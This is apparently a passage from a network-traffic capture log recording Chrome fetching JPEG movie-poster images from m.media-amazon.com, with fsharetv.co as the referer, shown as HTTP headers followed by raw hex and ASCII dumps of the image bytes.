                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:06 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 50325
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 9d8fc078-266a-4a7c-becc-e8699c6a66e1
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Mon, 25 Apr 2016 20:20:45 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Fri, 04 Nov 2044 04:41:56 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2783630
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:05 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200111-IAD, cache-nyc-kteb1890022-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:06 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 a5 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 06 03 04 05 07 08 02 00 01 09 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 00 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 c9 5c 2d c0 1c f3 d7 a4 f9 f7 ef c9 3d
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5\-=
                                                                                                                                                                                          2024-12-15 11:38:06 UTC1378INData Raw: 71 74 42 70 44 44 e0 64 74 e8 43 b7 9a b9 3d ae e5 12 e7 f1 91 66 ec f2 a5 2c e4 5a b1 ab 22 2f e0 49 9e 13 f0 8b 20 93 f1 1d 3a f9 d4 14 e8 36 a0 e5 96 af b0 dc f2 19 37 3e c8 e2 71 50 b8 59 a9 1f b3 57 1c 22 da 42 04 5a 0d 20 61 5b 58 77 56 fe 50 66 6a 3c b7 5e ef 2e af ce ad 97 87 f5 6f 13 41 46 7e bc 3d 26 4d 94 db 39 5b bf 8d d7 a9 37 32 dd 08 f2 b7 e0 5d a3 4d f2 7d 97 51 bd a2 78 23 7c f1 ca a0 94 2e 5f aa b4 09 77 f2 a4 8b 0b 0d 97 99 91 fa 78 af e7 ed f1 09 7e 1b be 68 18 aa 38 67 e2 2d 83 ca 2c de 28 84 54 e1 8c 91 b7 4d 6a ed 93 46 cc 44 2f ae 92 fe a2 23 b0 ee fc fe d9 74 1d cb c3 d2 6e 42 21 e7 07 79 d6 d4 a2 3b d8 eb 1a f4 dc 39 59 09 66 1e 06 46 4c 5f d0 df c6 59 84 dd 1e e2 af 26 99 15 af b4 f5 66 68 05 a0 4d d4 f1 98 86 9b fd 1b c0 44 75
                                                                                                                                                                                          Data Ascii: qtBpDDdtC=f,Z"/I :67>qPYW"BZ a[XwVPfj<^.oAF~=&M9[72]M}Qx#|._wx~h8g-,(TMjFD/#tnB!y;9YfFL_Y&fhMDu
                                                                                                                                                                                          2024-12-15 11:38:06 UTC1378INData Raw: 55 6a ca de f0 34 d7 47 04 e4 55 0c 6d d1 d5 6a ba 2c ee aa ac b4 d3 b9 83 57 e3 ea 4d 47 3a 4b 3f 62 1e 1a 4a 3d 2f 2b 78 d9 6b 28 66 3d 3e c6 bb 69 d2 b1 63 de bf 82 2f f8 0a 76 bb e1 60 8e 9a 3c 10 95 23 6f 20 64 a4 cb d9 0a 46 bb 67 24 1b ce a4 59 54 91 1c 99 11 9c e4 21 54 22 88 b1 98 21 81 60 f2 72 3a 0c 95 1c 64 28 1c 17 96 65 28 a4 4e 1d 81 57 5f 23 46 d9 f7 9a c3 2c 35 cb ef bb 89 6d 17 7e 7b 09 dd 7a 54 ac f1 18 b3 ba b4 e7 3e 3d ef 43 e2 5a ad ef 16 f2 3e f4 2d 96 f7 80 75 d7 bd 0f 29 fb c5 7e 73 ef 15 f7 3e f2 97 bf 3d e9 1d 23 ef 43 2d 07 ef 03 ca fe f2 37 88 fd e7 46 e5 1e f4 77 dd fb d5 da 70 db de e2 7a 5a ad 8f bd d7 f3 d1 b7 e7 bd 4e 88 fb 27 de cb d0 ff c4 00 32 10 00 02 01 04 01 03 03 03 03 04 02 02 03 00 00 00 01 02 03 00 04 11 12 05
                                                                                                                                                                                          Data Ascii: Uj4GUmj,WMG:K?bJ=/+xk(f=>ic/v`<#o dFg$YT!T"!`r:d(e(NW_#F,5m~{zT>=CZ>-u)~s>=#C-7FwpzZN'2
                                                                                                                                                                                          2024-12-15 11:38:06 UTC1378INData Raw: 8f 16 b1 83 24 7c 6d a7 b7 4a e5 6c cc c5 35 b2 b1 36 ca 45 5f c4 b1 93 9f 5b 78 0c ac 00 8e 3e 9a 85 18 a1 f4 6e 70 a0 de 4a f7 52 81 53 4c f2 eb bd b5 89 ba 54 d2 dd fd bc c0 90 b9 8d f1 48 c5 08 61 c6 72 3d 7f cf 50 6b 92 e2 7a 79 78 8a e2 a2 88 c8 ca 8a 8b 1a f5 03 85 a1 1c 92 c0 2a 08 77 3d df 44 dc 47 1c 0b 6f 16 1c b4 33 00 1e 6e 0f 39 61 14 d2 58 48 d8 4e 76 4c fc e0 e5 62 b9 6d 6b b9 ac 05 a9 b2 54 eb 33 ee 7d 6c ac 1e ec fc 6d 2d 12 d5 35 5f ab 24 80 2a da 09 2e 9d b5 42 06 73 ee dd a1 10 55 ca f4 7e c5 34 9d 43 84 e9 92 0b 0f b5 87 a4 25 48 23 8b bd dc 9d f1 fc 72 5c 59 61 d4 41 09 fd ec 38 d8 ee 50 e4 db 94 f3 dd 8b 2c 42 41 3f c2 ac 60 4f 8b 36 92 47 ae 92 5d 2a fc 6e 7a 4d 6e 04 b6 bc 9d 9c 73 23 49 1d 03 8f 1c 4d db 5c a9 07 2a 2b 90 e5 53
                                                                                                                                                                                          Data Ascii: $|mJl56E_[x>npJRSLTHar=Pkzyx*w=DGo3n9aXHNvLbmkT3}lm-5_$*.BsU~4C%H#r\YaA8P,BA?`O6G]*nzMns#IM\*+S
                                                                                                                                                                                          2024-12-15 11:38:06 UTC1378INData Raw: bc c7 df 78 ad 95 cb 1d 8b aa 9c 13 50 47 bb 76 86 d0 ca ee 03 a8 8c 14 68 5b e0 b5 b5 67 e8 e3 1f 49 76 a3 3e f1 a3 c7 1c e9 2f f6 f8 99 da 66 72 6f 10 c6 14 a4 da 48 7e cc 13 b5 ab e1 fd fa 8d 0d 4b 29 91 f1 2a 85 90 81 4d 14 5f 88 e9 84 4c 55 ad 9c 76 8c 45 47 26 dd 8b 30 c6 f5 9e ed 4a 76 5f 8a 00 46 28 53 0d 81 53 37 05 04 9d d4 7f c7 9b 6e f6 96 3e d4 50 f4 f1 5c a4 b1 b3 30 72 63 07 04 7c 82 ad 5b 5b 92 15 ea e1 64 8d 71 48 42 88 fa b6 ac 41 30 92 71 d8 ab 50 f5 e2 ed c5 c4 ba b9 f8 80 15 b2 d5 6a 8a 8b 91 25 bf d8 53 57 29 f7 d0 99 ee e5 f9 a5 41 71 27 78 d1 25 3f e4 11 58 82 05 b6 ea ba 81 af 54 ab cf 8c 1a 18 66 44 a8 db 7c 9a 4a 3f ed 30 c3 fa 1c a7 2a ee 5a 14 7b a9 25 7c d3 c8 8f da 92 00 40 50 f1 35 af dc 8a 6b c1 2c 65 8d 84 9b 1e 93 89 46
                                                                                                                                                                                          Data Ascii: xPGvh[gIv>/froH~K)*M_LUvEG&0Jv_F(SS7n>P\0rc|[[dqHBA0qPj%SW)Aq'x%?XTfD|J?0*Z{%|@P5k,eF
                                                                                                                                                                                          2024-12-15 11:38:06 UTC1378INData Raw: 2b fb c5 4d 72 d3 ec 56 21 32 b5 c4 9b d6 4c ff 00 94 71 ae 7a 67 a1 a0 cb 58 dc 18 ee 04 8f 7c 14 61 28 2e fc 7f 60 f8 14 64 24 6b eb 06 81 81 79 2f 0b 54 73 4a da 6b 6c 12 60 f0 98 38 f8 95 8d 19 7a 07 02 70 1d 4d 32 77 38 b7 9a 33 3a e1 b4 05 a4 68 a7 59 c5 39 e9 62 8b 95 61 aa 6e e8 4a b4 9f 6d ab 68 be 2c 51 d1 32 4b c6 a2 1a 67 1d b2 7e e8 34 d0 8d 32 54 88 f5 35 65 73 f9 25 2b 1f 14 67 3b 30 2b 32 eb f1 92 23 b6 4a da 4b b2 bd 43 c5 49 2a 22 b2 da fb 25 17 2c 6e 98 cb d4 a1 21 47 dd 64 7d f1 5c 65 c0 11 b2 b5 d4 62 29 1d 05 1a f3 da bd be f8 35 0c 08 98 c1 11 c4 19 6a 0b 9e 99 ea 53 b6 d8 95 2f 63 ea 06 35 ef 22 45 c1 8f 99 64 ec 2d 60 8e 49 75 22 d2 1a 58 93 50 a2 28 10 e9 ad cc 3d 3c 61 14 32 fc d9 14 c6 c6 27 84 6e 42 81 a6 58 71 d9 3b 83 71 04
                                                                                                                                                                                          Data Ascii: +MrV!2LqzgX|a(.`d$ky/TsJkl`8zpM2w83:hY9banJmh,Q2Kg~42T5es%+g;0+2#JKCI*"%,n!Gd}\eb)5jS/c5"Ed-`Iu"XP(=<a2'nBXq;q
                                                                                                                                                                                          2024-12-15 11:38:06 UTC1378INData Raw: 3c d7 e4 6a c2 c9 6e 58 8a 85 16 11 ac 7b 7f 32 95 23 0d 75 6b ed 4e f0 88 f7 14 90 54 76 ff 00 bd 41 6f d8 1a 9d 30 0d 49 09 90 e6 bd b5 2c 0c a4 32 c7 1c 98 f9 ca b3 f6 0b 2c 12 c8 ad 90 f2 58 00 0c 9c 80 71 a9 92 4c 92 48 75 15 c5 90 c2 53 4e 85 30 1c fc 4e 6a 43 d4 0d 56 a7 38 c3 f7 5d 68 91 53 db b3 21 14 54 8e c6 ad f6 a9 81 ed 41 24 61 a5 24 4c df 90 39 c0 a5 b5 33 0e c3 88 44 5e f7 36 bd 03 81 c5 27 4e dd 29 ce 3b 56 75 ed 52 1d 46 6a e6 4d a8 7d a3 9a 88 24 bd d0 24 60 6c d1 f2 68 cd a9 92 fe 0a fd 4c 6e 73 6d 3c 17 1d 94 45 40 62 9e 11 27 e7 25 b6 3c 4d 3b a1 21 24 99 df f2 6f 4e 35 16 34 19 d6 46 6a 68 8b 76 33 db 24 48 4d 58 c8 0c 92 21 b8 4c 7c c3 cc 15 f6 a8 55 cc 65 9d 86 09 14 9c 6e 68 71 db a8 55 fd 31 49 cb 2c 28 83 14 2c 13 bd 2d b4 4a
                                                                                                                                                                                          Data Ascii: <jnX{2#ukNTvAo0I,2,XqLHuSN0NjCV8]hS!TA$a$L93D^6'N);VuRFjM}$$`lhLnsm<E@b'%<M;!$oN54Fjhv3$HMX!L|UenhqU1I,(,-J
                                                                                                                                                                                          2024-12-15 11:38:06 UTC1378INData Raw: 76 63 f2 5a f2 39 8a 36 60 c0 15 b3 f8 3c 21 b1 76 5d 5f 8b 74 40 23 2b 1a 25 6e 9b fa f5 fb 1f c3 8e 30 59 e4 dc e0 eb 67 6f 69 6c 11 3c ad ff 00 18 da de 6f fc 2d 67 f0 15 12 1c d3 f0 c7 58 fc 92 3f de 57 e3 2e b0 90 75 14 f3 23 95 65 75 71 c9 72 ab 0b 64 b2 19 e5 e0 36 74 93 69 69 7e 3d ed 66 f9 08 df 91 27 fe 46 78 d3 24 d2 c9 33 e1 6e 3f 9d 64 ba 82 41 88 c7 9d b0 36 a0 92 32 79 88 22 25 4f 86 35 11 3b 41 5c 40 66 00 1b 97 4d a6 9d 8c 3a da d1 eb a7 18 cc c4 67 c8 1b d5 7a af c0 63 42 a2 9b 22 d9 f8 da f2 79 63 66 e7 1e ba 09 03 ca cd ac 63 b2 b3 ee cb 0c 61 23 46 d8 3d cc 9a c8 3b 23 2b aa c5 14 f9 5e b7 3c dc 9a b2 2c 4b a1 e6 e7 d9 98 c7 25 e5 fa 07 1d c8 2a 44 da ec 47 38 ef 62 58 c8 7d 7d c4 60 23 c9 f6 51 54 e6 bc f1 ce bc d6 62 08 ac 87 95 51
                                                                                                                                                                                          Data Ascii: vcZ96`<!v]_t@#+%n0Ygoil<o-gX?W.u#euqrd6tii~=f'Fx$3n?dA62y"%O5;A\@fM:gzcB"ycfca#F=;#+^<,K%*DG8bX}}`#QTbQ
                                                                                                                                                                                          2024-12-15 11:38:06 UTC1378INData Raw: 0c 15 1f bd 84 4d fc c5 3f d8 ad 65 7a fe df 22 dd 4e a2 d3 cb e9 ad db bd 91 48 ca b6 d1 f8 06 c4 35 02 a1 8f 50 c4 72 3d c3 78 3d f6 6f 1d bc 8c 41 45 47 99 b1 41 cc 4a b9 ef d8 35 4a 58 cb 35 41 c6 c4 40 76 c0 7f 15 b3 1e 5d 11 94 63 04 1c 1c 40 93 b7 16 80 13 71 52 6a f2 1e ab 06 d8 40 db b2 5e e1 6b 0b d0 26 60 38 99 fc 31 31 11 ca e4 46 af 00 60 98 0c ae ac 82 49 a9 cf f6 56 b7 f0 c4 aa 33 10 15 74 b6 15 1b ac a1 d9 be 69 a1 57 38 16 69 1e 93 86 99 84 74 c7 4c 4f 11 ae 3f a4 b3 4e 6c 4c 4d 3d 76 2a ed b6 cb 99 48 55 af 50 b6 e0 37 b7 4b 1c 39 d3 68 e8 03 72 6a 7d 67 50 e4 a2 33 91 c9 5b b2 43 0b df 75 00 f5 f6 cb 69 2c 2e d2 aa 2e 56 6d 98 98 9b 11 94 83 a7 d5 2a 13 5d a0 69 6b b4 6c d4 fa 63 d5 f3 14 e9 c8 3b 9a d5 74 61 bb d3 eb b1 5c b8 d7 8a 4d
                                                                                                                                                                                          Data Ascii: M?ez"NH5Pr=x=oAEGAJ5JX5A@v]c@qRj@^k&`811F`IV3tiW8itLO?NlLM=v*HUP7K9hrj}gP3[Cui,..Vm*]iklc;ta\M
                                                                                                                                                                                          2024-12-15 11:38:06 UTC1378INData Raw: 04 79 04 5f 35 d6 08 3e 3b 56 aa 78 99 4d 09 a8 7c d4 23 f9 9c 56 b9 ca 43 8a 36 3f 4a 2e 57 cb e4 5b e1 3f 89 07 fb a1 da 3e 22 cf 73 22 57 3e cf 0f 5c 94 00 f2 ed 0e 2f cd 41 3d ab 92 e1 8a 81 f4 d1 43 a3 69 9a c5 c9 6b c6 d3 2e 5b cc 4b cd 40 65 e3 26 26 e2 25 e4 8b c0 0c 8f c5 10 0a 0d e7 a7 51 4b 0a 0e 08 a3 d9 74 71 7b fc 27 76 2a fa e8 fd b0 d9 f0 50 57 e0 b9 5e a4 45 de bd 90 9b 3b 2a a0 3f b4 ad 1c 43 36 74 09 26 81 8a 84 ce f6 5a f8 43 0c df d8 28 db 4a 61 9c 4e 43 1f d1 20 c3 05 fc 4d 23 5d 0c a7 79 bb 72 82 2f da 54 07 f6 95 09 1b 90 e2 8b 6c ea 5b 50 fe ab be aa 2e 3d 49 07 2a 21 0e f5 1b aa 9b 95 ca e0 39 cf e2 2d e4 53 41 a6 bc 1b fa c5 06 3d 8e f7 c9 43 cd 42 9b 82 3e 9d bc 14 76 0c 24 b6 c3 34 5c 1b d4 62 17 c4 b2 d3 40 4c 2d 14 3a c0 ce
                                                                                                                                                                                          Data Ascii: y_5>;VxM|#VC6?J.W[?>"s"W>\/A=Cik.[K@e&&%QKtq{'v*PW^E;*?C6t&ZC(JaNC M#]yr/Tl[P.=I*!9-SA=CB>v$4\b@L-:


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          69192.168.2.1649801151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:06 UTC676OUTGET /images/M/MV5BNzEzM2IxY2EtZjc0MS00ODYwLTgzMGEtMTNjY2EwYzViYmFhXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:07 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 29138
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 658738cd-9d18-4efe-a350-150b38ffed20
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 31 Aug 2017 19:53:21 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Wed, 07 Dec 2044 13:20:40 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 253047
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:07 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200137-IAD, cache-ewr-kewr1740075-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c3 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 00 06 03 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 06 07 04 05 08 09 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e5 d6 83 37 2c 20 90 b0 de e0 d5 86 c4
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"57,
                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: 11 0a 67 e5 5b d9 b2 9d 7b e2 b2 b8 4c eb 6c 1e c9 d4 ab 3d b6 55 c4 8d b9 e6 d7 5c f4 54 9a 6f 67 d5 92 ca 3b 93 a1 b0 4a d7 80 18 04 b3 6d a1 2d d9 ba fd 96 2c 59 ac 77 1b aa c7 f4 3b ca cf 54 73 8e 18 8e 74 60 87 1b 6b b6 1a c9 bb dd 03 ce 32 b2 f9 bd 39 2e d2 89 e8 4a 5a 41 cb ea b9 a9 db c4 66 de 99 65 d7 16 35 72 f2 8a 51 18 cb d3 7c de 80 e6 79 96 f9 48 a1 91 fd 4d 6b 30 7b 4d b5 bb 49 2e 6f 5f 11 0f 4e 5e 2e 12 46 0e 06 60 13 25 e1 cd f6 8a d4 96 8c ec f2 33 c4 ce bb d1 0f 3b 31 28 f4 96 01 3a e7 1a d6 86 c5 c8 c1 9b e3 ad 22 22 c0 ed 5e 39 ea b5 ec 1e 39 ec 8e 5e 56 a1 cf d1 ca 67 a6 7b d7 5e 76 e0 bb 22 b9 38 8f df cb 4e 2b 9b f4 44 73 f6 af ef 46 f3 4d fb c6 6e af 61 89 11 11 c1 de e8 f9 ec 02 5d a0 cd 0f 1b cb c3 56 d6 b7 8e c7 3a 5f 92 2b 7c
                                                                                                                                                                                          Data Ascii: g[{Ll=U\Tog;Jm-,Yw;Tst`k29.JZAfe5rQ|yHMk0{MI.o_N^.F`%3;1(:""^99^Vg{^v"8N+DsFMna]V:_+|
                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: 05 12 10 13 21 31 06 14 20 22 32 23 30 33 41 40 42 24 51 53 52 25 50 61 ff da 00 08 01 01 00 01 08 02 cd 66 b3 59 ac d6 7e c6 6b 35 9e 19 ac d6 6b 35 9a cd 66 b3 59 ac d6 6b 35 9a cd 66 b3 59 ac d6 6b 35 9f 54 30 3c e7 11 f0 03 3d 02 d8 bf f7 7b 48 a2 88 b9 fe 4e da db e8 b9 b0 92 d9 55 9d 11 1a 09 4d 59 5c f2 b7 a9 9b e4 c6 ae ac c4 28 ae b6 37 7b 98 47 53 6d 5b 9f a9 2e a4 09 ca b3 6e 24 9f e2 85 ad 9e 9d 39 a3 59 97 9b 75 b7 98 fb 15 e6 bd 8c 29 b9 b5 8a d9 7a cb 1c 88 88 2d 75 49 14 ec 5a 4d 40 a4 6a 95 35 c3 cd d5 ff 00 8a 01 ad 95 8f 5c 5b 77 2e f4 ff 00 cc 77 48 a9 23 05 bb bd f3 0a a2 83 b0 18 e0 c8 50 e1 bf 87 b6 a3 87 75 05 a1 0d 08 85 35 bf fa ed eb 7b a9 5c 61 ab 96 db 43 d5 8d b8 b9 7e 59 b2 b9 f2 d2 c7 2d 5d ff 00 90 e6 48 93 4f 32 26 f5 bf
                                                                                                                                                                                          Data Ascii: !1 "2#03A@B$QSR%PafY~k5k5fYk5fYk5T0<={HNUMY\(7{GSm[.n$9Yu)z-uIZM@j5\[w.wH#Pu5{\aC~Y-]HO2&
                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: de db e1 f6 6d ec a6 ba cf 2a 68 1e 06 d9 20 ab 79 96 28 11 ab e9 c7 53 7d 11 ed bf c3 6d 92 91 a6 58 e3 e4 da 23 5c c3 24 73 6a 12 28 81 63 1a 2a 6e b8 15 72 39 40 35 79 b9 56 46 90 5b dd 34 6a d4 1b dd 81 1d 85 d9 76 6b 7d 52 ce 48 36 5c 3d f6 27 89 27 59 cf f8 c8 2a 35 1c 99 08 e1 1d c8 82 0c d4 5a 74 f7 a8 66 a8 3c 35 ff 00 6b 7d 32 de db e1 eb 87 4e 32 db b4 c2 a1 85 e6 6d a9 26 95 73 1e 37 43 a1 cd 2d 44 86 c6 25 8d 75 77 69 61 52 f4 a1 f9 0a a4 dd 08 88 e5 cd 1b c5 d5 2e 03 08 70 d6 77 6d 10 2b 52 6a 0f 38 2a 2e 33 82 5b c3 a4 07 96 b5 8b ee 5a ed 16 b2 53 cc ab da df fd d6 92 fb a2 c5 6b 91 73 2d 25 ad 2e 4d dc c8 4d cf b5 36 d5 98 fa aa 68 69 92 ce df 42 df c3 3f f6 83 4e 82 1c 6d 92 74 8f e7 7b e2 45 8c ed 82 1f 14 4a 0f d5 b4 d4 21 bb 19 4f 4c
                                                                                                                                                                                          Data Ascii: m*h y(S}mX#\$sj(c*nr9@5yVF[4jvk}RH6\=''Y*5Ztf<5k}2N2m&s7C-D%uwiaR.pwm+Rj8*.3[ZSks-%.MM6hiB?Nmt{EJ!OL
                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: 31 9e c2 bf df 14 f7 28 35 61 2e e5 e1 a8 29 92 5c 52 c7 d1 c5 73 c9 8b 63 ee 23 15 8e 12 ff 00 5a cf c6 a4 f9 1e 01 68 8e c6 80 ef 49 fa a0 b8 a7 1d 7d 56 df 30 28 5a b6 32 cf 0e f2 40 de 8b f1 32 b1 ac d0 86 42 33 4a 85 8e 2b 46 7d d6 b1 57 88 a2 df 6d ba 97 f5 47 b7 1b 03 9f 6d 5a 4e b6 c4 ef 9b 5f 41 f8 e5 be 79 4e 4e fe 18 ad bc 1f b5 03 d2 a4 fe b5 8a c5 0a 14 9d a9 bb 1a 6f 70 cf a5 41 63 81 1c 82 01 88 e1 b9 89 cb f3 f9 bb 3a 23 fb 72 b4 a3 79 02 a3 e4 c1 db 24 f5 32 8d ca 45 78 76 5c ac c9 57 d0 f3 a0 99 2a 2e b4 7f 62 92 26 7e cb 67 ff 00 ad e1 3e 19 f4 07 22 94 ee e2 3a 8a 4c 75 cb f4 58 fd 02 94 d6 70 40 a2 bb 69 d7 69 c7 00 0b 76 58 00 ea fe 60 27 44 c3 4d 9a b5 81 18 b6 e7 70 a3 ad cb 07 91 88 ab 49 b1 ed 0a 70 7d db ab 40 b9 ff 00 28 8e 1c
                                                                                                                                                                                          Data Ascii: 1(5a.)\Rsc#ZhI}V0(Z2@2B3J+F}WmGmZN_AyNNopAc:#ry$2Exv\W*.b&~g>":LuXp@iivX`'DMpIp}@(
                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: 3a 0c 7b 2d 22 af 13 cb 88 23 4a b5 67 47 12 c6 8e 24 55 75 d4 34 8f 37 34 53 2d 6a 17 e3 cf 73 92 e3 c4 d0 27 e3 9f c4 37 52 fc 64 91 a4 39 7e 2a 70 41 a0 25 3d 85 b6 e1 5b d2 24 c5 24 cd 1a b2 82 c4 80 0f f0 8d 5b 45 ca 8a 24 a9 ad 22 9c ab 48 63 0c a5 2a c3 57 7d 37 74 0e fe 29 8b fa de eb 93 dd 02 bf 60 1c 75 a9 2e 99 9b 2a ee 5f e5 58 fe 2d b6 bf 04 76 f1 73 27 f1 43 9f c5 71 a8 dc 5c fe 4f e0 ed ac 56 2b 1c 71 58 ac 51 1e 9c 56 2b 15 8a c5 62 b1 58 ac 56 2b 15 8a c5 63 d1 8a c5 62 b1 c3 1c 4d 67 d0 3e e7 5a eb 59 ae b5 d7 d2 68 f1 eb 5d 6b ad 75 ae d5 8a c7 0c 51 ae b5 83 5d 7d 38 ac 56 38 62 b1 58 f4 63 86 0d 60 d6 2b 1c 31 47 d1 8a c5 0c 56 05 1a e9 5d 38 62 b1 58 ac 57 4e 1f aa e9 c3 a7 0e 9c 3a 57 4a c5 62 b1 58 e1 d3 87 4a e9 5d 28 e3 f9 5b 3a
                                                                                                                                                                                          Data Ascii: :{-"#JgG$Uu474S-js'7Rd9~*pA%=[$$[E$"Hc*W}7t)`u.*_X-vs'Cq\OV+qXQV+bXV+cbMg>ZYh]kuQ]}8V8bXc`+1GV]8bXWN:WJbXJ]([:
                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: 4c 96 60 63 67 c2 6b 23 d6 b2 79 69 0b 35 9d 29 0c 95 93 8f ed 7c 07 2c 92 49 c5 1c e3 76 ac ac 23 8b ec c7 77 d4 1e 12 29 b2 38 0d a3 89 11 56 36 0a 9a 63 21 bc 9b 49 e9 85 23 03 11 e0 60 5c 18 7c e2 63 60 f1 84 60 ca f2 3b 41 b5 85 66 a2 50 49 03 4b 3a aa 73 24 d6 ed b6 09 fd 32 57 35 5a a4 65 01 7b 56 0c 03 18 62 b0 18 4d f2 14 fe b0 e5 61 ca a3 89 28 43 79 2d 38 a0 09 5f 04 de 5f b3 75 1c 19 63 1a 8e 0a fd f0 3b 1f 18 32 3e 9f 3c bf 60 fe 2e e7 97 a0 54 e1 02 b8 cb f6 b4 68 bc 64 9a 17 84 02 f0 68 1a 6e 43 74 2a 1c 15 20 d1 fd 64 7d 36 79 7e c4 e8 3c 7f 64 7a 08 61 e5 57 50 3c 1d f8 0e 50 03 1c 76 ae fb 73 4f b3 d4 1b f5 3d 45 66 01 16 0d 51 85 c3 07 ea d1 28 e1 df 73 16 3d 2d 63 64 7b 27 26 d5 d3 6d 41 af 2a c0 3a 1b 5e 56 5a 14 6e a8 82 f6 31 bc 0e
                                                                                                                                                                                          Data Ascii: L`cgk#yi5)|,Iv#w)8V6c!I#`\|c``;AfPIK:s$2W5Ze{VbMa(Cy-8__uc;2><`.ThdhnCt* d}6y~<dzaWP<PvsO=EfQ(s=-cd{'&mA*:^VZn1
